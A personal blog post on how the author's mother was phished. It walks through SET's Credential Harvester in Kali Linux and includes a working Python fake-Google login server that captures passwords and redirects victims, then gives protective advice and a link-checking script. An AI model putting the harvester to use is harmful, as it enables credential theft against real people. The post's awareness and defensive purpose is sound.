I never realized how easy it was to get a username and password to an email account until my mother was hacked. Listening to her explain what happened, I realized that the attack was simple enough… she logged in to her Google account through an email asking her to confirm her username and password. Why would she question the request?
When I got access to her laptop I suspected the attack on her credentials was much larger and had migrated into her computer. She told me of unauthorized Amazon purchases while I watched random popup messages appear on her laptop. I closed her computer, told her to never log into it again, bought her an iPad, and changed all her passwords. Then we had a long talk about malicious links and random support people calling her up to ‘help’ her.
I tried to understand how she got to this point of compromised accounts and discovered that it's pretty simple.
Email Phishing Attack
Phishing is a type of online scam in which criminals impersonate legitimate organizations via email, text message, or advertisement to steal usernames and passwords. The message includes a link that appears to lead to the company’s website, where you are asked to fill in your information; the site is a convincing fake, and whatever you type goes straight to the people behind the scam.
It went down something like this:
- The attacker sent my mother a phishing email: a carefully worded message asking her to click a link and sign in to her Google.com account, warning that if she did not respond immediately she would be locked out.
- She clicked the link and arrived at a web page that looked identical to the Google.com login page.
- She entered her username and password into the fake page. The page then passed her along to the real Google site, so she saw normal Google pages and believed she had signed in and saved her account from being locked.
- Meanwhile her username and password were sent to the attacker, who collected them and moved on to the next stage of the attack.
A carefully crafted phishing email, free of typos and bizarre grammar, is important to the success of a phishing campaign. The email she received looked much like the test message I recreated for this article, with the subject line: Verify Your Google Account.
This particular method relies on two of the most common social engineering levers used by malicious actors: trust and urgency.
Ironically, a couple of days after I sent this test phishing email to myself, I saw it sitting in my inbox and opened it, forgetting that I had crafted this alert for this article. It’s easy to be fooled if you are distracted!
How a Hacker Stole My Mother’s Login Information
We are going to use Kali Linux for this walkthrough, but there are several tools available for credential harvesting. This attack is amazingly simple; I’m surprised it is so easy to implement.
- From the command line, launch the Social-Engineer Toolkit (SET) as root with the setoolkit command.
The Social-Engineer Toolkit is a set of tools provided by TrustedSec (trustedsec.com) for penetration testing and ethical hacking.
- From the main menu, select Option 1, Social-Engineering Attacks.
- From the Social-Engineering Attacks menu, select Option 2, Website Attack Vectors.
- From the Website Attack Vectors menu, select Option 3, Credential Harvester Attack Method. Using built-in templates, this option lets us imitate popular websites such as Google, Yahoo, Twitter, and Facebook.
- From the Credential Harvester Attack Method menu, select Option 1, Web Templates.
- SET now asks for the IP address for the POST back in Harvester/Tabnabbing, pre-filled with the address it detected on your machine (192.168.1.183 in this example). This is the address the victim’s browser will submit the form to. If the victim is on the same local network as the collecting machine, accept the default; otherwise enter an address the victim can actually reach, such as your public or port-forwarded address.
- From the list of Web Templates, select Option 2, Google.
The Credential Harvester then builds a temporary website from its built-in Google template (the separate Site Cloner option would copy a live page instead), starts a web server on the address you specified, and listens on port 80. Every connection to that port is logged to the console.
You can test the harvester by pointing your browser at the IP address you supplied at the Harvester/Tabnabbing prompt, or by embedding that link in your carefully crafted phishing email.
The setup is complete. All the attacker needs to do is wait for somebody to load the page.
Casual users won’t notice the unusual URL (a bare IP address rather than google.com) or the Not Secure warning highlighted in red in the web browser’s location bar, which appears because the page is served over plain HTTP.
Successful Credential Capture
Meanwhile, the attacker waits for the capture message to appear on the SET console.
Completing the fake Google Account login page captures the credentials and sends them to the console of the attacker’s computer. SET reports them as a possible username and a possible password field, because it only guesses from the form field names. In our example the possible username is email@example.com and the password appears to be Ilikecats.
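To make the mechanism concrete, here is a small stand-in for what SET’s Credential Harvester does, written for this article as an added example; it is not SET’s own code. It serves a fake sign-in form over plain HTTP, records whatever is POSTed to it, and then redirects the visitor to the real Google sign-in page so the victim sees a genuine site afterwards. The form field names (Email, Passwd), the port, and the redirect target are assumptions chosen for the demonstration. Run it only against accounts and machines you are authorized to test.

```python
"""
Minimal credential-harvesting page in the style of SET's Credential Harvester.
Added illustration for this article, not SET's code. Serves a fake login form
over plain HTTP, records any POSTed form fields, then redirects the victim to
the real site so nothing looks wrong. For authorized testing only.
"""
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://accounts.google.com/"  # where the victim lands afterwards (assumed)
CAPTURED = []  # in-memory log; SET prints the equivalent on its console

# Stand-in for the template page. SET ships a full copy of the real HTML; a
# bare form is enough to show the mechanism. The relative action POSTs back to us.
LOGIN_FORM = b"""<html><body>
<h2>Sign in</h2>
<form method="POST" action="/">
  Email <input name="Email"><br>
  Password <input name="Passwd" type="password"><br>
  <input type="submit" value="Next">
</form></body></html>"""

# Field-name fragments that mark a "possible username/password field",
# which is the same kind of guess SET makes when it labels its output.
SENSITIVE = ("pass", "pwd", "email", "user", "login")


def parse_credentials(body: bytes) -> dict:
    """Turn an application/x-www-form-urlencoded body into a dict, keeping
    only the fields whose names look like identity or secret material."""
    fields = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()
            if any(tag in name.lower() for tag in SENSITIVE)}


def record_capture(client_ip: str, body: bytes) -> dict:
    """Build and store the log entry for one form submission."""
    entry = {
        "time": datetime.now(timezone.utc).isoformat(),
        "client": client_ip,
        "fields": parse_credentials(body),
    }
    CAPTURED.append(entry)
    return entry


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any path gets the fake form; the phishing link can point anywhere on this host.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(LOGIN_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        entry = record_capture(self.client_address[0], self.rfile.read(length))
        print(f"[*] {entry['time']} {entry['client']} -> {entry['fields']}")
        # Bounce to the real site; the victim sees a genuine Google page.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()


if __name__ == "__main__":
    # SET binds port 80 (hence running as root) on the POST-back address;
    # 8080 is used here so the demo runs without privileges.
    HTTPServer(("0.0.0.0", 8080), Harvester).serve_forever()
```

The two things worth noticing are that the server never validates anything (any username and password are accepted) and that the redirect to the real site is what keeps the victim from realizing the login failed. Browsing to the bare IP over http shows exactly the Not Secure indicator described above.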
A little bit of trust and a believable story are all that is needed to harvest some credentials. Imagine launching this attack against several thousand email addresses.
How to Protect Mom
There is nothing new in preventing this type of attack. Regular everyday security practices apply: do not click on links from somebody you do not trust, and never sign in to an account from a link in an email that asks you to. If you feel the need to follow a link, check the address in the location bar before typing anything: it should be https, it should belong to the company’s real domain (a trusted name buried inside a longer, unfamiliar domain does not count), there should be no typos, and it should not be a bare IP address. Safer still, open a new tab and type the site’s address yourself or use a bookmark. Turning on 2-Step Verification for the Google account means a stolen password alone is not enough to get in.
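The checks in the paragraph above can be made mechanical. The function below, added for this article rather than taken from any tool, returns the reasons a link should not be trusted: plain http, a bare IP address, a username-before-@ trick, a punycode host, or a trusted name embedded in an untrusted domain. The set of expected domains and the sample links are assumptions constructed for the demonstration, and an empty result only means these particular checks did not fire.

```python
"""
Signals that a sign-in link from an email should not be trusted.
Added example for this article; TRUSTED and the sample links are assumed.
"""
from ipaddress import ip_address
from urllib.parse import urlsplit

# Domains the reader actually intends to sign in to (assumption for the example).
TRUSTED = {"google.com", "accounts.google.com"}


def _is_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _under(host: str, domain: str) -> bool:
    """True if host is domain itself or a real subdomain of it; a plain
    substring match would wrongly accept google.com.evil.example."""
    return host == domain or host.endswith("." + domain)


def phishing_signals(url: str, expected=TRUSTED) -> list:
    """Return the reasons a link should not be trusted. An empty list means
    none of these checks fired, which is not proof that the link is safe."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").rstrip(".")  # urlsplit lowercases the hostname
    reasons = []
    if not host:
        return ["no host in link"]
    if parts.scheme != "https":
        reasons.append("not https (browser shows Not Secure)")
    if parts.username is not None:
        # https://accounts.google.com@203.0.113.5/ connects to 203.0.113.5
        reasons.append("text before @ is not the host; browser connects to " + host)
    if _is_ip(host):
        reasons.append("host is a bare IP address, not a company domain")
        return reasons
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode host; may use look-alike characters")
    if not any(_under(host, d) for d in expected):
        if any(d in host for d in expected):
            reasons.append(f"trusted name embedded in untrusted host {host}")
        else:
            reasons.append(f"{host} is not one of the expected domains")
    return reasons


if __name__ == "__main__":
    # Constructed sample links: the real sign-in page, SET's bare IP, and two tricks.
    for link in ["https://accounts.google.com/signin",
                 "http://192.168.1.183/",
                 "https://accounts.google.com.verify-login.example/",
                 "https://accounts.google.com@203.0.113.5/"]:
        print(link, "->", phishing_signals(link) or ["looks consistent"])
```

The SET link from the walkthrough trips two checks at once (plain http and a bare IP), which is exactly what the red Not Secure indicator was trying to tell Mom.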
She loves her new iPad.